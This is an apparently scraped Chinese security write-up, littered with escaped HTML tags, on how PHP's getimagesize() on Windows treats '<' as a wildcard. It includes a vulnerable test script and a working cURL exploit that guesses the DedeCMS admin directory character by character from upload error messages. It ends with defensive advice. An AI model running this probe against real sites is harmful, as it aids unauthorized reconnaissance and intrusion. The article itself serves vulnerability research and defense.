PHP文件判断函数的安全风险与实战分析<\/h1>

一、背景概述<\/h2>

PHP作为以C语言为底层的开源脚本语言，在Web开发领域广泛应用。其文件操作函数属于敏感函数，不当使用会导致多种安全隐患：<\/p>

任意文件下载<\/li>
任意文件写入<\/li>

任意文件删除<\/li> <\/ul>

本文重点分析getimagesize()<\/code>等文件判断函数在Windows系统下的特殊行为及其安全风险。<\/p>

二、Windows API特性分析<\/h2>
PHP在Windows系统上调用FindFirstFileExW()<\/code>底层API时存在特殊字符处理特性：<\/p>



字符<\/th>
Windows API等效<\/th>
说明<\/th>
<\/tr>
<\/thead>


><\/code><\/td>
?<\/code><\/td>
通配符(匹配单个字符)<\/td>
<\/tr>

<<\/code><\/td>
*<\/code><\/td>
通配符(匹配多个字符)<\/td>
<\/tr>

"<\/code><\/td>
.<\/code><\/td>
点字符<\/td>
<\/tr>
<\/tbody>
<\/table>
这一特性影响所有调用该API的PHP函数，包括但不限于getimagesize()<\/code>。<\/p>
三、getimagesize()函数分析<\/h2>
1. 函数调用链<\/h3>
PHP_FUNCTION(getimagesize)
<\/span><\/span>    →<\/span> php_getimagesize_from_any
<\/span><\/span>        →<\/span> ... 
<\/span><\/span>            →<\/span> tsrm_realpath_r
<\/span><\/span>                →<\/span> FindFirstFileExW
<\/span><\/span><\/code><\/pre>2. 漏洞验证代码示例<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>$a =<\/span> $_GET['img'<\/span>];
<\/span><\/span>if<\/span>(@<\/span>getimagesize<\/span>($a)){
<\/span><\/span>    echo<\/span> "ok"<\/span>;
<\/span><\/span>}else<\/span>{
<\/span><\/span>    echo<\/span> "no"<\/span>;
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>测试用例：http:\/\/127.0.0.1\/test.php?img=C:\phpStudy\www\a<\1.png<\/code><\/p>
四、DedeCMS实例分析<\/h2>
1. 漏洞触发点<\/h3>
uploadsafe.inc.php<\/code>中的关键代码：<\/p>
if<\/span>(in_array<\/span>(strtolower<\/span>(trim<\/span>($<\/span>{$_key.<\/span>'_type'<\/span>})), $imtypes)){
<\/span><\/span>    $image_dd =<\/span> @<\/span>getimagesize<\/span>(
<\/span><\/span>$$<\/span>
<\/span><\/span>_key<\/span>);
<\/span><\/span>    if<\/span> (!<\/span>is_array<\/span>($image_dd)) {
<\/span><\/span>        exit<\/span>('Upload filetype not allow !'<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 文件引用关系<\/h3>
tags.php 
    → common.inc.php (约148行)
        → uploadsafe.inc.php 
            → getimagesize()
<\/code><\/pre>
3. EXP利用原理<\/h3>
利用<<\/code>通配符特性逐位猜解后台目录：<\/p>

构造路径如a<\/images\/admin_top_logo.gif<\/code><\/li>
通过响应判断目录是否存在：

返回"Upload filetype not allow !" → 目录不存在<\/li>
无此错误 → 目录存在<\/li>
<\/ul>
<\/li>
<\/ol>
4. EXP核心代码分析<\/h3>
function<\/span> my_func<\/span>($url, $path) {
<\/span><\/span>    \/\/ 初始化cURL
<\/span><\/span><\/span><\/span>    $ch =<\/span> curl_init<\/span>($url);
<\/span><\/span>    $i =<\/span> 48<\/span>;
<\/span><\/span>    global<\/span> $version;
<\/span><\/span>    
<\/span><\/span>    while<\/span>($i <=<\/span> 90<\/span>) {
<\/span><\/span>        if<\/span>((48<\/span> <=<\/span> $i &&<\/span> $i <=<\/span> 57<\/span>) or<\/span> (65<\/span> <=<\/span> $i &&<\/span> $i <=<\/span> 90<\/span>)) {
<\/span><\/span>            \/\/ 构造测试路径
<\/span><\/span><\/span><\/span>            if<\/span>($version !=<\/span> '5.7'<\/span>) {
<\/span><\/span>                $admin_path =<\/span> $path .<\/span> chr<\/span>($i) .<\/span> '<\/img\/admin_top_logo.gif'<\/span>;
<\/span><\/span>            } else<\/span> {
<\/span><\/span>                $admin_path =<\/span> $path .<\/span> chr<\/span>($i) .<\/span> '<\/images\/admin_top_logo.gif'<\/span>;
<\/span><\/span>            }
<\/span><\/span>            
<\/span><\/span>            \/\/ 构造POST数据
<\/span><\/span><\/span><\/span>            $data =<\/span> 'dopost=save&_FILES[b4dboy][tmp_name]='<\/span>.<\/span>$admin_path.<\/span>'&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image\/gif'<\/span>;
<\/span><\/span>            
<\/span><\/span>            \/\/ 设置cURL选项
<\/span><\/span><\/span><\/span>            $options =<\/span> array<\/span>(
<\/span><\/span>                CURLOPT_USERAGENT<\/span> =><\/span> 'Firefox\/58.0'<\/span>,
<\/span><\/span>                CURLOPT_RETURNTRANSFER<\/span> =><\/span> true<\/span>,
<\/span><\/span>                CURLOPT_POST<\/span> =><\/span> true<\/span>,
<\/span><\/span>                CURLOPT_POSTFIELDS<\/span> =><\/span> $data,
<\/span><\/span>            );
<\/span><\/span>            curl_setopt_array<\/span>($ch, $options);
<\/span><\/span>            
<\/span><\/span>            \/\/ 执行请求并检查响应
<\/span><\/span><\/span><\/span>            $response =<\/span> curl_exec<\/span>($ch);
<\/span><\/span>            if<\/span>(!<\/span>preg_match<\/span>('\/(Upload filetype not allow \/i'<\/span>, $response)) {
<\/span><\/span>                $path =<\/span> $path .<\/span> chr<\/span>($i);
<\/span><\/span>                return<\/span> $path;
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>        $i++<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>五、防御建议<\/h2>

对用户输入进行严格过滤，特别是文件路径参数<\/li>
避免直接使用用户输入构造文件路径<\/li>
使用白名单机制限制允许的文件类型和路径<\/li>
在非必要情况下，避免在Windows服务器上部署敏感应用<\/li>
<\/ol>
六、扩展思考<\/h2>

PHP中哪些其他函数会调用FindFirstFileExW()<\/code>\/FindFirstFile()<\/code> API？<\/li>
其他调用这些Windows API的语言是否也存在类似特性？<\/li>
如何在不影响业务功能的前提下安全使用文件判断函数？<\/li>
<\/ol>
七、参考资源<\/h2>

PHP漏洞挖掘思路+实例<\/a><\/li>
先知社区相关讨论<\/a><\/li>
<\/ol>

PHP文件判断函数的安全风险与实战分析<\/h1>

七、参考资源<\/h2> PHP漏洞挖掘思路+实例<\/a><\/li> 先知社区相关讨论<\/a><\/li> <\/ol>

七、参考资源<\/h2>

PHP漏洞挖掘思路+实例<\/a><\/li>
先知社区相关讨论<\/a><\/li> <\/ol>